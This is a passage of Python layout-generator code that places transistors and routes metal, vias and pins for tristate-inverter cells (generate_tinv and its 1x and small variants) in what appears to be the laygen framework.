xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # dummy gate if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([1, 2]), xy1=np.array([-1, 2]), gridname0=rg_m1m2, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[-1,0], refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[1,0], endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([1, 2]), xy1=np.array([-1, 2]), gridname0=rg_m1m2, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[-1,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[1,0], endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 2]), xy1=np.array([0, 2]), gridname0=rg_m1m2, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[0,0], refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 2]), xy1=np.array([0, 2]), gridname0=rg_m1m2, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[0,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 2]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), via0=[0,0], refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 2]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), via0=[0,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]), via1=[0,0]) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # in0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # en0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([1, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([1, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) # enb0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) # internal connection between stacked mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # mux output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R" + objectname_pfix + "VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss = laygen.route("R" + objectname_pfix + "VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_nmos_space, devname_pmos_boundary, devname_pmos_body_2stack, devname_pmos_space, pin_i_abut="nmos", origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I" + objectname_pfix + 'N4', templatename = devname_nmos_space, gridname = pg, refinstname = in3.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I" + objectname_pfix + 'P4', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, transform='MX') # route # input if pin_i_abut == "nmos": refinstname_in = in1.name refinstname_en0 = in1.name refinstname_en1 = ip1.name else: refinstname_in = ip1.name refinstname_en0 = ip1.name refinstname_en1 = in1.name laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # en laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en0, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # enb laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0+1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en1, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip4.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv_small_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_nmos_space, devname_pmos_boundary, devname_pmos_body_2stack, devname_pmos_space, pin_i_abut="nmos", origin=np.array([0,0]), create_pin=False): """small tristate inverter for latches and FFs""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I" + objectname_pfix + 'N4', templatename = devname_nmos_space, gridname = pg, refinstname = in3.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I" + objectname_pfix + 'P4', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, transform='MX') # route # input if pin_i_abut == "nmos": refinstname_in = in1.name refinstname_en0 = in1.name refinstname_en1 = ip1.name else: refinstname_in = ip1.name refinstname_en0 = ip1.name refinstname_en1 = in1.name laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # en laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en0, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # enb laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0+1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en1, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), 